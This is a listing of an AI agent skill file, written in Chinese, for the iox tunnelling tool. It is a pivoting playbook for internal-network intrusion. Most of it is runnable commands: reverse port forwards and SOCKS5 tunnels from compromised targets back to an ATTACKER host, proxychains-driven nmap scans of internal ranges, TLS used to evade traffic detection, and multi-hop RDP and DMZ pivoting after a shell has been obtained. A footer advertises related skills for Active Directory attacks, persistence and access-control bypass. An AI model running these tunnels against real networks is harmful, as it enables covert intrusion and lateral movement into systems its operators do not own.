iox-proxy

$npx mdskill add wgpsec/AboutSecurity/iox-proxy

Forward internal ports and build SOCKS5 tunnels with iox.

  • Enables traffic tunneling for accessing hidden internal services.
  • Integrates with proxychains for SOCKS5 routing configurations.
  • Executes commands via CLI flags for port mapping and encryption.
  • Delivers results by establishing active or passive network connections.

SKILL.md

.github/skills/iox-proxyView on GitHub ↗
---
name: iox-proxy
description: "使用 iox 进行端口转发和内网穿透。当需要把内网端口转发到外网、建立 SOCKS5 隧道、或做流量中转时使用。iox 是单二进制零依赖的端口转发/代理工具,支持正向代理、反向代理、端口映射、SOCKS5 代理,特别适合内网渗透中的流量隧道搭建。比 frp/nps 轻量,比 socat 功能更全。涉及端口转发、内网穿透、SOCKS5 代理、流量中转、隧道搭建的场景使用此技能"
metadata:
  tags: "iox,proxy,forward,tunnel,socks5,端口转发,内网穿透,隧道,代理,pivot"
  category: "tool"
---

# iox 端口转发与内网穿透

iox 是一个轻量级端口转发/代理工具——单个二进制文件,零依赖,支持正向/反向代理和 SOCKS5。在内网渗透中用于搭建流量隧道,让攻击机能访问目标内网服务。

项目地址:https://github.com/EddieIvan01/iox

## 核心概念

iox 有两个主要模式:
- **fwd** (forward):端口转发——把一个端口的流量转到另一个地址
- **proxy**:SOCKS5 代理——创建代理让攻击机通过目标网络访问内网

每个模式都支持**正向**(目标监听)和**反向**(目标主动连接攻击机)两种连接方式。

## 端口转发 (fwd)

### 正向转发(目标端口 → 目标内网)

在目标机器上运行,把外部访问转到内网:

```bash
# 将目标 8888 端口转发到内网 10.0.0.2:3389
iox fwd -l 8888 -r 10.0.0.2:3389
# 攻击机访问 target:8888 就能连到 10.0.0.2:3389 (RDP)
```

### 反向转发(目标主动连出)

目标无法被直接访问时(有防火墙),让目标主动连接攻击机:

```bash
# 攻击机:监听两个端口
iox fwd -l 8888 -l 9999

# 目标机:连接攻击机,同时连接内网目标
iox fwd -r ATTACKER:8888 -r 10.0.0.2:3389

# 攻击机访问 localhost:9999 就能连到内网 10.0.0.2:3389
```

## SOCKS5 代理 (proxy)

### 正向代理

在目标机器上启动 SOCKS5,攻击机通过目标代理访问内网:

```bash
# 目标机:启动 SOCKS5 代理
iox proxy -l 1080

# 攻击机:配置 proxychains
echo "socks5 TARGET 1080" >> /etc/proxychains.conf
proxychains nmap -sT 10.0.0.0/24
```

### 反向代理(最常用——目标出不了入站但能出站)

```bash
# 攻击机:监听等待连接
iox proxy -l 9999

# 目标机:反连攻击机
iox proxy -r ATTACKER:9999

# 攻击机通过 localhost:9999 使用 SOCKS5
proxychains nmap -sT 10.0.0.0/24
```

## 加密传输

```bash
# 使用 TLS 加密(避免流量特征检测)
iox fwd -l 8888 -r 10.0.0.2:3389 -k

# 反向也支持
iox proxy -r ATTACKER:9999 -k    # 目标
iox proxy -l 9999 -k              # 攻击机
```

## 实战场景

### 场景 1:RDP 内网穿透

```bash
# 目标已拿 shell,需要 RDP 到内网 10.0.0.2
# 攻击机
iox fwd -l 33890 -l 8888
# 目标机
iox fwd -r ATTACKER:8888 -r 10.0.0.2:3389
# 攻击机 RDP 连接
rdesktop localhost:33890
```

### 场景 2:多层内网穿透

```bash
# 第一层:已拿 DMZ 主机
iox proxy -l 1080                          # DMZ 上开 SOCKS5
# 第二层:通过 DMZ 代理访问内网主机
proxychains iox proxy -l 1081 -r 10.0.0.5  # 连到第二层
```

## 决策树

```
需要什么类型的隧道?
├─ 简单端口转发(一个端口映射到另一个)→ iox fwd
├─ SOCKS5 全代理(访问整个内网网段)→ iox proxy
├─ 目标有防火墙限制入站 → 反向模式(-r 代替 -l)
├─ 需要加密 → 加 -k 参数
├─ 需要持久化隧道/Web 管理面板 → frp / nps
└─ 只是临时转一个端口 → socat / ssh -L 也行
```

More from wgpsec/AboutSecurity

SkillDescription
401-403-bypass401/403 访问拒绝绕过方法论。当遇到管理后台、API 端点返回 401/403 Forbidden 时使用。覆盖路径操纵、HTTP 方法篡改、Header 注入、协议降级、组合攻击
ad-acl-abuseActive Directory ACL 滥用攻击方法论。当 BloodHound 发现 GenericAll/WriteDACL/WriteOwner/GenericWrite/ForceChangePassword 等危险 ACE 时使用。覆盖 ACE 枚举、权限滥用链、Shadow Credentials、RBCD 攻击
ad-delegation-attackKerberos 委派攻击(非约束/约束/RBCD)。当 BloodHound 发现委派配置、或已获取有 SPN 的服务账号/机器账号控制权时使用。通过 S4U 协议滥用可实现跨服务模拟任意用户,常用于域内权限提升和横向移动。
ad-domain-attackActive Directory 域环境攻击全链路。当目标主机在域环境中(systeminfo 显示 Domain 非 WORKGROUP)、发现 88/389/636 端口、或获取到域用户凭据时使用。覆盖域信息收集、用户枚举、Kerberoasting、AS-REP Roasting、委派攻击、ACL 滥用、DCSync、Golden/Silver Ticket
ad-persistenceAD 域环境持久化技术。当已获取域管/本地管理员权限、需要建立持久访问以确保重启或密码更改后仍能回到目标环境时使用。覆盖主机级持久化(计划任务/注册表Run/COM劫持/WMI事件订阅/Windows服务/启动文件夹)、域级持久化(Golden Ticket/Silver Ticket/Skeleton Key/DSRM/AdminSDHolder)、DCShadow/GoldenGMSA高级技术、清理命令与检测规避
ad-trust-attack域信任关系攻击。当目标存在多域/多林环境时使用。包含父子域提权(Golden Ticket + ExtraSid)、跨林攻击(SID History/MSSQL Trust Links)、单向信任利用。已获取子域 Domain Admin 或发现信任关系时优先加载。
adcs-certipy-attackActive Directory Certificate Services (ADCS) 证书攻击。当发现域内有 CA 服务器、ADCS Web Enrollment、证书模板配置错误时使用。覆盖 ESC1-ESC11 所有证书滥用路径、Certipy 工具链、证书伪造、NTLM 中继到 ADCS。发现 ADCS/CA/证书/certsrv 相关内容时一定要使用此技能
adinfo-enum使用 Adinfo 进行 Active Directory 信息收集。当获得域用户凭据后需要快速收集域环境信息时使用。Adinfo 是一个快速 AD 信息收集工具,一条命令输出域控列表、域管用户、信任关系、GPO、SPN、委派配置等关键信息——比手动 LDAP 查询快得多。发现域环境后第一步信息收集使用此技能
agent-security|
ai-data-security|